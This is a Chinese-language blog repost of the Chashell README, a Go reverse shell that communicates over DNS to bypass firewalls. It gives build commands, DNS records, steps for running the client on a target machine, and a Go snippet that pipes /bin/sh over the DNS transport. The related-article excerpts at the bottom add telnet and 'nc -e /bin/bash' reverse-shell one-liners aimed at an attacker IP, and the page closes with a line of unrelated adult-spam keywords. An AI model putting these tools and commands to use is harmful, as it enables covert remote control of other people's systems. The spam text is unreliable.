<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    Chashell:基于DNS的反向Shell

    一顆小胡椒2021-12-26 22:59:41

    Chashell是一個由Go編寫的基于DNS進行通信的反向shell。它可用于繞過防火墻或嚴格限制的網絡。

    它帶有一個名為chaserv的多客戶端控制服務器。

    通信安全

    每個數據包都使用對稱加密(XSalsa20 + Poly1305)進行加密,客戶端和服務器之間使用共享密鑰。

    我們計劃在未來實現非對稱加密。

    協議

    Chashell使用Protocol Buffers序列化消息進行通信。作為參考,協議緩沖區結構(.proto文件)在proto文件夾中可用。

    這是一個(簡化的)通信圖表:

    請記住,每個數據包都經過加密,十六進制編碼,然后被打包用于DNS傳輸。

    支持的系統

    Chashell可以在任何支持Go編譯器的桌面系統使用(如Windows,Linux,Darwin,BSD衍生版本)。

    我們已在以下系統進行了測試:

    Windows (386/amd64)
    Linux (386/amd64/arm64)
    OS X (386/amd64)

    Chaserv/Chashell 使用

    構建

    在運行這些命令之前,請確保已正確配置GOPATH環境變量。

    構建所有二進制文件(根據需要調整domain_name和encryption_key):

    $ export ENCRYPTION_KEY=$(python -c 'from os import urandom; print(urandom(32).encode("hex"))')
    $ export DOMAIN_NAME=c.sysdream.com
    $ make build-all
    

    為特定平臺構建:

    $ make build-all OSARCH="linux/arm"
    

    僅構建服務器:

    $ make build-server
    

    僅構建客戶端(chashell本身):

    $ make build-client
    

    DNS 設置

    購買并配置你選擇的域名。

    設置DNS記錄:

    chashell 300 IN A [SERVERIP]
    c 300 IN NS chashell.[DOMAIN].
    

    使用

    在服務器端(攻擊者的計算機),你必須使用chaserv二進制文件。對于客戶端(即目標),請使用chashell二進制文件。

    因此:

    在控制服務器運行chaserv
    在目標計算機運行chashell

    客戶端現在應該回連到chaserv:

    [n.chatelain]$ sudo ./chaserv
    chashell >>> New session : 5c54404419e59881dfa3a757
    chashell >>> sessions 5c54404419e59881dfa3a757
    Interacting with session 5c54404419e59881dfa3a757.
    whoami
    n.chatelain
    ls /
    bin
    boot
    dev
    [...]
    usr
    var
    

    使用sessions [sessionid]命令與客戶端進行交互。與之交互過程中,你可以使用background命令將會話轉為后臺執行,并返回到chashell提示符。

    使用exit命令關閉chaserv。

    實現自己的反向 shell

    chashell/lib/transport庫與io.Reader/io.Writer接口兼容。因此,實現反向shell非常簡單:

    cmd := exec.Command("/bin/sh")
    dnsTransport := transport.DNSStream(targetDomain, encryptionKey)
    cmd.Stdout = dnsTransport
    cmd.Stderr = dnsTransport
    cmd.Stdin = dnsTransport
    cmd.Run()
    

    未來計劃

    實現非對稱加密(Curve25519,XSalsa20和Poly1305)
    使用InfoPacket消息檢索主機名
    創建代理/中繼工具隧道TCP/UDP流(通過DNS進行Meterpreter!)
    更好的錯誤處理
    擺脫依賴
    dnsshell
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    其中一些工具是 CQURE 團隊首次向世界公開發布的。如果可以使用 Shell 命令,則可以使用 Sampler 暫時將其可視化。受害者使用特定的目標移動應用程序掃描 QR 碼。攻擊者獲得對受害者帳戶的控制權。該服務正在與攻擊者的會話交換所有受害者的數據。
    (翻譯版)Numpy反序列化命令執行淺析代碼審計Python安全編碼和代碼審計Python代碼審計連載之一:CSRF?p=738Python代碼審計連載之三:Server Side Request?p=744Python代碼審計連載之四:Command Execution?p=747Dangerous Python Functions, Part 1Dangerous Python Functions, Part 2Dangerous Python Functions, Part 3記一下PythonWeb代碼審計應該注意的地方廖新喜大佬的python代碼審計工具來自openstack安全團隊的python代碼靜態審計工具來自openstack安全團隊的python代碼靜態審計工具2代碼審計工具pytxfkxfk的python自動化代碼審計?
    Chashell是一個由Go編寫的基于DNS進行通信的反向shell。它可用于繞過防火墻或嚴格限制的網絡。它帶有一個名為chaserv的多客戶端控制服務器。+ Poly1305)進行加密,客戶端和服務器之間使用共享密鑰。
    一個內網安全攻防的知識倉庫
    信息搜集:開源情報信息收集、創建企業密碼字典進入內網:基于企業弱賬號漏洞、基于系統漏洞進入、網站應用程序滲透隱匿攻擊:Command and Control、代理內網跨邊界應用:內網跨邊界轉發、內網跨邊界代理穿透、shell反彈等
    使用 ICMP 傳遞 shellcode
    2021-02-17 21:59:14
    在研究不同的滲透方法時,我遇到了一種利用DNS的技術。在編寫概念證明代碼時,我注意到實現的ping函數很有趣。我們可以提供一個可容納65,500字節的緩沖區。由于大小限制很大,我們可以將shellcode加載到我們的ICMP請求中,然后將其注入到目標的進程中。
    是Linux中的一個特殊設備,打開這個文件就相當于發出了一個socket調用,建立一個socket連接,讀寫這個文件就相當于在這個socket連接中傳輸數據。同理,Linux中還存在/dev/udp/。telnet反彈nc -lvvp 444 #攻擊者主機上執行監聽rm -f /tmp/p; mknod /tmp/p p && telnet x.x.x.x 4444 0/tmp/p #目標主機上執行。監聽兩個端口分別用來輸入和輸出,其中x.x.x.x均為攻擊者ip反彈shell成功后,在監聽4444端口的終端中執行命令可以在另一個終端中看到命令執行結果。 nc反彈nc -lvvp portnc -e /bin/bash x.x.x.x port
    域名準備選擇哪家的云都沒問題,這里我選擇的TX云,因為之前注冊過了,自己拿來做個流量分析不成問題。域名添加解析記錄需要準備自己的vps作為DNS隧道的服務端,且需要添加ns記錄iodined關閉53端口關閉開機自啟systemctl?“D”的數量隨級別增加。
    前言看到一篇文章講到這個內容,就打算自己也整理一下順便梳理一下思路0X01 信息收集1.收集系統信息:系統信息至關重要,關乎我們后面怎么提權中文系統:systeminfo|findstr /B /C:"OS 名稱" /C:"OS 版本". OS 名稱: Microsoft Windows Server 2008 R2 Standard. 禁用 入站 Internet Explorer / C:\Program Files \In. 800 TCP 啟用 入站 test
    之前在網上看到很多師傅們總結的linux反彈shell的一些方法,為了更熟練的去運用這些技術,于是自己花精力查了很多資料去理解這些命令的含義,將研究的成果記錄在這里,所謂的反彈shell,指的是我們在自己的機器上開啟監聽,然后在被攻擊者的機器上發送連接請求去連接我們的機器,將被攻擊者的shell反彈到我們的機器上,下面來介紹分析幾種常用的方法。
    一顆小胡椒
    暫無描述
      亚洲 欧美 自拍 唯美 另类